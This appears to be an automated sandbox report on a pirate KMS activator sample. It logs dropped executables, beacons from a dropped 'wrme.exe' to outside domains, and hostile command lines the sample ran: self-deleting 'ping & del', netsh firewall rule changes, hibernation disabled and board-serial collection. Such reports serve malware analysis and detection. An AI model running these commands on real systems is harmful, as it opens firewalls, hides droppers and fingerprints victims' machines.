Jul 25, 2024 02:19:51.775418997 CEST1236INData Raw: 34 37 39 31 66 66 20 74 72 61 6e 73 70 61 72 65 6e 74 20 23 34 37 39 31 66 66 20 23 34 37 39 31 66 66 7d 7d 0a 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73 20 79 79 2d 69 70 74 2d 62 6c 75 65 7b 30 25 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 31
Data Ascii: 4791ff transparent #4791ff #4791ff}}@-o-keyframes yy-ipt-blue{0%{border-color:#e10602 transparent #e10602 #e10602}100%{border-color:#4791ff transparent #4791ff #4791ff}}@keyframes yunying{0%{background-color:#3385ff;border-bottom:1px solid
Jul 25, 2024 02:19:51.775429964 CEST896INData Raw: 73 20 79 75 6e 79 69 6e 67 2d 62 6c 75 65 7b 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 31 30 36 30 32 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 33 30 36 30 32 7d 0a 31 30 30 25 7b 62
Data Ascii: s yunying-blue{0%{background-color:#e10602;border-bottom:1px solid #c30602}100%{background-color:#3385ff;border-bottom:1px solid #2d78f4}}.sethf{padding:0;margin:0;font-size:14px}.set_h{display:none;behavior:url(#default#homepage)}.set_f{d
Jul 25, 2024 02:19:51.782552004 CEST1236INData Raw: 63 66 2e 67 69 66 29 5c 39 7d 0a 2e 62 64 73 75 67 20 6c 69 7b 77 69 64 74 68 3a 35 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 3a 31 34 70 78 20 61 72 69 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 3b 70 61 64 64 69
Data Ascii: cf.gif)\9}.bdsug li{width:522px;color:#000;font:14px arial;line-height:22px;padding:0 8px;position:relative;cursor:default}.bdsug li.bdsug-s{background:#f0f0f0}.bdsug-store span,.bdsug-store b{color:#7A77C8}.bdsug-store-del{font-size:12px;


HTTPS Proxied Packets

Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.749708103.224.212.2164436296C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe
TimestampBytes transferredDirectionData
2024-07-25 00:19:55 UTC155OUTPOST /api/v1/p HTTP/1.1
Host: da.testiu.com
Accept: */*
Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif;
Content-Length: 0
2024-07-25 00:19:56 UTC339INHTTP/1.1 302 Found
date: Thu, 25 Jul 2024 00:19:56 GMT
server: Apache
set-cookie: __tad=1721866796.4553884; expires=Sun, 23-Jul-2034 00:19:56 GMT; Max-Age=315360000
location: http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2dc-6815f4609260
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
2024-07-25 00:19:56 UTC2INData Raw: 0a 0a
Data Ascii:


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.749711103.224.212.2114436296C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe
TimestampBytes transferredDirectionData
2024-07-25 00:19:57 UTC155OUTPOST /api/v1/p HTTP/1.1
Host: db.testyk.com
Accept: */*
Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif;
Content-Length: 0
2024-07-25 00:19:57 UTC339INHTTP/1.1 302 Found
date: Thu, 25 Jul 2024 00:19:57 GMT
server: Apache
set-cookie: __tad=1721866797.3434330; expires=Sun, 23-Jul-2034 00:19:57 GMT; Max-Age=315360000
location: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a132-0ab44d06a73d
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
2024-07-25 00:19:57 UTC2INData Raw: 0a 0a
Data Ascii:


Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Target ID:1
Start time:20:19:48
Start date:24/07/2024
Path:C:\Users\user\Desktop\HEU_KMS_Activator.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\HEU_KMS_Activator.exe"
Imagebase:0x400000
File size:5'596'080 bytes
MD5 hash:28C6BC044E78763A789638242F708F9E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

General

Target ID:2
Start time:20:19:48
Start date:24/07/2024
Path:C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe
Wow64 process (32bit):true
Commandline:C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
Imagebase:0x630000
File size:921'936 bytes
MD5 hash:1474BD3EDA2E087560754241A0B92991
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Avira
  • Detection: 87%, ReversingLabs
Reputation:low
Has exited:true

General

Target ID:3
Start time:20:19:49
Start date:24/07/2024
Path:C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe
Wow64 process (32bit):true
Commandline:C:\Users\user~1\AppData\Local\Temp\J8156NOVDEC.exe
Imagebase:0xbf0000
File size:921'936 bytes
MD5 hash:1474BD3EDA2E087560754241A0B92991
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Avira
  • Detection: 87%, ReversingLabs
Reputation:low
Has exited:false

General

Target ID:4
Start time:20:19:49
Start date:24/07/2024
Path:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
Wow64 process (32bit):true
Commandline:C:\Users\user~1\AppData\Local\Temp\HEU_KMS_Activator.exe
Imagebase:0xd30000
File size:5'054'976 bytes
MD5 hash:7CD8B711BE93FF8858B7DC753C4065CA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Joe Sandbox ML
  • Detection: 66%, ReversingLabs
Reputation:low
Has exited:false

General

Target ID:5
Start time:20:19:49
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:6
Start time:20:19:49
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:7
Start time:20:19:49
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:8
Start time:20:19:49
Start date:24/07/2024
Path:C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):true
Commandline:ping -n 3 127.1
Imagebase:0x6c0000
File size:18'944 bytes
MD5 hash:B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

General

Target ID:9
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c echo [Temp] >%windir%\ScriptTemp.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:10
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:11
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\drivers\DvLayout.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" Hook
Imagebase:0x370000
File size:278'352 bytes
MD5 hash:99B17FCCE8D54EA90FF5C0B9EF4FCE73
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Avira
  • Detection: 69%, ReversingLabs
Reputation:low
Has exited:true

General

Target ID:12
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

General

Target ID:13
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):true
Commandline:powercfg /h off
Imagebase:0x490000
File size:78'336 bytes
MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

General

Target ID:14
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:15
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c echo Temp=_temp07242019502489 >>%windir%\ScriptTemp.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:16
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:17
Start time:20:19:50
Start date:24/07/2024
Path:C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install
Imagebase:0xe60000
File size:644'944 bytes
MD5 hash:35C545E719D8D04771BE35081626CE3B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 100%, Avira
  • Detection: 58%, ReversingLabs
Has exited:true

General

Target ID:18
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:19
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:20
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\SgrmBroker.exe
Imagebase:0x7ff74cd00000
File size:329'504 bytes
MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

General

Target ID:21
Start time:20:19:50
Start date:24/07/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Imagebase:0x1770000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:22
Start time:20:19:51
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

General

Target ID:24
Start time:20:19:51
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

General

Target ID:25
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:26
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:27
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Imagebase:0x1770000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:28
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

General

Target ID:29
Start time:20:19:52
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

General

Target ID:31
Start time:20:19:53
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

General

Target ID:32
Start time:20:19:53
Start date:24/07/2024
Path:C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):true
Commandline:wmic BaseBoard get SerialNumber
Imagebase:0x120000
File size:427'008 bytes
MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:33
Start time:20:19:53
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:34
Start time:20:19:53
Start date:24/07/2024
Path:C:\Windows\_temp07242019502489\7Z.EXE
Wow64 process (32bit):true
Commandline:C:\Windows\_temp07242019502489\7Z.EXE x C:\Windows\_temp07242019502489\KMSmini.7z -y -oC:\Windows\_temp07242019502489
Imagebase:0x400000
File size:587'776 bytes
MD5 hash:42BADC1D2F03A8B1E4875740D3D49336
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 0%, ReversingLabs
Has exited:true

General

Target ID:35
Start time:20:19:54
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:36
Start time:20:19:54
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

General

Target ID:37
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo [Direction] >%windir%\_temp07242019502489\ScriptDir.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:38
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:39
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Dir=C:\Users\user\AppData\Local\Temp >>%windir%\_temp07242019502489\ScriptDir.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:40
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:41
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & echo Name=HEU_KMS_Activator.exe >>%windir%\_temp07242019502489\ScriptDir.ini
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:42
Start time:20:19:55
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:43
Start time:20:19:56
Start date:24/07/2024
Path:C:\Windows\_temp07242019502489\kms_x64.exe
Wow64 process (32bit):false
Commandline:C:\Windows\_temp07242019502489\kms_x64.exe
Imagebase:0x7ff67b700000
File size:1'092'608 bytes
MD5 hash:99DF73A907996E98E96917FAE743B506
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 4%, ReversingLabs
Has exited:false

General

Target ID:45
Start time:20:20:33
Start date:24/07/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

General

Target ID:46
Start time:20:20:53
Start date:24/07/2024
Path:C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:0x7ff777fc0000
File size:468'120 bytes
MD5 hash:B3676839B2EE96983F9ED735CD044159
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

General

Target ID:47
Start time:20:20:53
Start date:24/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Disassembly

Reset < >

    Execution Graph

    Execution Coverage:18.1%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:21.2%
    Total number of Nodes:1434
    Total number of Limit Nodes:40
    execution_graph 3858 402040 3859 40143a 18 API calls 3858->3859 3860 402048 3859->3860 3861 40143a 18 API calls 3860->3861 3862 402051 GetDlgItem 3861->3862 3863 402bc7 3864 402bce 3863->3864 3866 402bf1 3863->3866 3865 40143a 18 API calls 3864->3865 3867 402bda 3865->3867 3868 402be1 SetFilePointer 3867->3868 3868->3866 3839 4019cd 3840 401450 18 API calls 3839->3840 3841 4019d5 3840->3841 3842 405b60 2 API calls 3841->3842 3843 4019dc 3842->3843 3869 406bcd 3873 4067bf 3869->3873 3870 4070eb 3871 406846 GlobalAlloc 3871->3870 3871->3873 3872 40683d GlobalFree 3872->3871 3873->3870 3873->3871 3873->3872 3873->3873 3874 4068b2 GlobalFree 3873->3874 3875 4068bb GlobalAlloc 3873->3875 3874->3875 3875->3870 3875->3873 3876 406ccf 3877 4067bf 3876->3877 3878 406cd5 3876->3878 3877->3878 3879 406846 GlobalAlloc 3877->3879 3880 40683d GlobalFree 3877->3880 3881 4068b2 GlobalFree 3877->3881 3882 4068bb GlobalAlloc 3877->3882 3879->3877 3879->3878 3880->3879 3881->3882 3882->3877 3882->3878 3883 402ed2 SendMessageA 3884 402eeb InvalidateRect 3883->3884 3885 402ef6 3883->3885 3884->3885 3886 4020d5 GetDC GetDeviceCaps 3887 40143a 18 API calls 3886->3887 3888 4020f2 MulDiv 3887->3888 3889 40143a 18 API calls 3888->3889 3890 402108 3889->3890 3891 4060ec 18 API calls 3890->3891 3892 402141 CreateFontIndirectA 3891->3892 3893 401f57 3894 40143a 18 API calls 3893->3894 3895 401f5f 3894->3895 3896 40143a 18 API calls 3895->3896 3897 401f6a 3896->3897 3898 401f7b 3897->3898 3900 401450 18 API calls 3897->3900 3899 401f8c 3898->3899 3901 401450 18 API calls 3898->3901 3902 401f95 3899->3902 3903 401fdd 3899->3903 3900->3898 3901->3899 3904 40143a 18 API calls 3902->3904 3905 401450 18 API calls 3903->3905 3906 401f9d 3904->3906 3907 401fe5 3905->3907 3909 40143a 18 API calls 3906->3909 3908 401450 18 API calls 3907->3908 3910 401ff0 FindWindowExA 3908->3910 3911 401fa7 3909->3911 3914 402011 3910->3914 3912 401fcd SendMessageA 3911->3912 3913 401faf SendMessageTimeoutA 3911->3913 3912->3914 3913->3914 3844 4070dd 3846 4067bf 3844->3846 3845 4070eb 3846->3845 3847 406846 GlobalAlloc 3846->3847 3848 40683d GlobalFree 3846->3848 3849 4068b2 GlobalFree 3846->3849 3850 4068bb GlobalAlloc 3846->3850 3847->3845 3847->3846 3848->3847 3849->3850 3850->3845 3850->3846 3915 40425d 3916 404294 3915->3916 3917 4042c7 3915->3917 3983 4059df GetDlgItemTextA 3916->3983 3918 4042d4 GetDlgItem GetAsyncKeyState 3917->3918 3924 404361 3917->3924 3920 4042ee GetDlgItem 3918->3920 3931 40430c 3918->3931 3984 403be5 3920->3984 3921 40444a 3981 4045d6 3921->3981 3988 4059df GetDlgItemTextA 3921->3988 3922 40429f 3925 405ce3 5 API calls 3922->3925 3924->3921 3929 4060ec 18 API calls 3924->3929 3924->3981 3928 4042a5 3925->3928 3927 404301 ShowWindow 3927->3931 3933 403d1a 5 API calls 3928->3933 3935 4043dc SHBrowseForFolderA 3929->3935 3930 404476 3936 406014 18 API calls 3930->3936 3937 404329 SetWindowTextA 3931->3937 3943 405aa0 4 API calls 3931->3943 3934 4042aa GetDlgItem 3933->3934 3939 4042b8 IsDlgButtonChecked 3934->3939 3934->3981 3935->3921 3941 4043f4 CoTaskMemFree 3935->3941 3942 40447c 3936->3942 3940 403be5 19 API calls 3937->3940 3939->3917 3944 404347 3940->3944 3945 405fc0 3 API calls 3941->3945 3989 405cc1 lstrcpynA 3942->3989 3946 40431f 3943->3946 3947 403be5 19 API calls 3944->3947 3948 404401 3945->3948 3946->3937 3953 405fc0 3 API calls 3946->3953 3950 404352 3947->3950 3951 404438 SetDlgItemTextA 3948->3951 3957 4060ec 18 API calls 3948->3957 3987 403c3e SendMessageA 3950->3987 3951->3921 3952 404493 3955 405f56 3 API calls 3952->3955 3953->3937 3967 40449b 3955->3967 3956 40435a 3958 405f56 3 API calls 3956->3958 3959 404420 lstrcmpiA 3957->3959 3958->3924 3959->3951 3961 404431 lstrcatA 3959->3961 3961->3951 3962 4044d5 3990 405cc1 lstrcpynA 3962->3990 3963 4044de 3964 405aa0 4 API calls 3963->3964 3965 4044e4 GetDiskFreeSpaceA 3964->3965 3969 404506 MulDiv 3965->3969 3970 404528 3965->3970 3967->3962 3968 405fed 2 API calls 3967->3968 3967->3970 3968->3967 3969->3970 3971 404585 3970->3971 3991 404170 3970->3991 3973 4045a8 3971->3973 3975 401411 74 API calls 3971->3975 3999 403c2b EnableWindow 3973->3999 3974 404576 3977 404587 SetDlgItemTextA 3974->3977 3978 40457b 3974->3978 3975->3973 3977->3971 3980 404170 21 API calls 3978->3980 3979 4045c4 3979->3981 4000 403c07 3979->4000 3980->3971 4003 403c70 3981->4003 3983->3922 3985 4060ec 18 API calls 3984->3985 3986 403bf0 SetDlgItemTextA 3985->3986 3986->3927 3987->3956 3988->3930 3989->3952 3990->3963 3992 40418d 3991->3992 3993 4060ec 18 API calls 3992->3993 3994 4041cd 3993->3994 3995 4060ec 18 API calls 3994->3995 3996 4041d8 3995->3996 3997 4060ec 18 API calls 3996->3997 3998 4041e5 lstrlenA wsprintfA SetDlgItemTextA 3997->3998 3998->3974 3999->3979 4001 403c15 4000->4001 4002 403c1a SendMessageA 4000->4002 4001->4002 4002->3981 4004 403c85 GetWindowLongA 4003->4004 4014 403d0e 4003->4014 4005 403c96 4004->4005 4004->4014 